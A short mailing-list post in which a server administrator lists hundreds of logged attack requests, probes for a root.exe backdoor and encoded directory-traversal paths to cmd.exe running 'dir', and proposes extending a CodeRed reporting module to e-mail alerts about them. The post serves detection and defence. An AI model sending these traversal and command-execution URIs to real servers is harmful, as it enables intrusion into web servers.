Sorry for the off-topic post; there was a lot of discussion here of
CodeRed and Reuven's module to report attempted attacks.
Since this a.m. I have had hundreds of requests like:
/scripts/root.exe?/c+dir
/MSADC/root.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
etc.
They seem to come in batches of a dozen or more with slight variations in
the URI requested. I am thinking about adding support to CodeRed.pm (which
should probably be renamed if so) to report these attacks via e-mail in
the same way it does for CodeRed. Any interest in that? Or any info on
these bogus requests?
~~~~~~~~~~~
Nick Tonkin
